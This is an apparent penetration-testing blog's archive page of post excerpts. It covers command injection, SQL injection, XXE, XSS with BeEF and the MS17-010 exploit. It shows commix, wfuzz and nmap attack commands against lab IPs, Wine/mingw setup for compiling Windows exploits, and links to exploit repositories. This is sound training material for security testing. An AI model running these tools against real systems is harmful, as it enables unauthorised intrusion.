Month: February 2019
Transfer files – Windows
Several methods is described here, on how to transfer files between Windows system as victim and attack box. Start […]
Read More →XSS – Cross Site Scripting
BeeF Framework BeeF is native in Kali and is a browser exploitation framework. From the vulnerable website insert below […]
Read More →Linux Enum
Useful tools and methods to do Linux Enumeration. LinEnum.sh Collect Linux info – exploit suggest and priv escalation https://github.com/rebootuser/LinEnum.git […]
Read More →Vulnerability Scanning – OpenVAS
This post covers setting up OpenVAS9 Greenbone Security Assistant. The Dashboard: OpenVAS (Open Vulnerability Assessment System) is an opensource […]
Read More →Compiling exploits to Windows on Kali
Compile Win32 exploit with Wine install mingw
1 2 3 4 |
wget http://downloads.sourceforge.net/project/mingw/Installer/mingw-get-setup.exe wine mingw-get-setup.exe # (select mingw base and c++, menu -> apply changes, quit) |
1 2 |
wine regedit # (HKCU/Environment add string PATH c:\windows;c:\windows\system;c:\MinGW\bin) rm mingw-get-setup.exe |
install some libs mingw needs
1 2 |
wget http://gojhonny.com/misc/mingw_bin.zipunzip mingw_bin.zip -d /root/.wine/drive_c/windows/ rm mingw_bin.zip |
running
1 2 3 4 |
wine mingw32-gcc.exe foo.c -o foo.exe -lws2_32 wine mingw32-g++.exe foo.cpp -o foo.exe -lws2_32 |
Command Injection – Tools and methods
Below is a list of common tools and methods to test for command injection. Commix
1 2 |
commix -r /home/workdir/email.req –auth-cred=admin:password –all –batch –level 3 |
wfuzz
1 2 |
wfuzz -c -z file,/usr/share/wordlists/fuzzdb/attack/os-cmd-execution/Commands-Linux.txt,base64 -b “PHPSESSID=077dn044qmuh2ut41tksedvlv2” -d “check=FUZZ” http://10.10.10.105/diag.php |
curl […]
Read More →SQLMap
SQLMap is a tool that can be used to automate scanning and exploiting of SQL Injection. Below is some […]
Read More →SQL Injection – RCE and LFI Methods
Upload PHP Command Injection Following can be used to get RCE / Command Execution when target is vulnerable to […]
Read More →XXE/XML Attack
Malicious DTD Following snippet can be used to get Local File Inclusion or Remote Command Execution on vulnerable XML. […]
Read More →MS17-010
Resources for MS17-010 Exploit: https://github.com/3ndG4me/AutoBlue-MS17-010 https://github.com/helviojunior/MS17-010 Scan for Vulnerable MS17-010:
1 2 |
nmap --script smb-vuln* -p 139,445 10.1.1.22 |
https://github.com/claudioviviani/ms17-010-m4ss-sc4nn3r
Read More →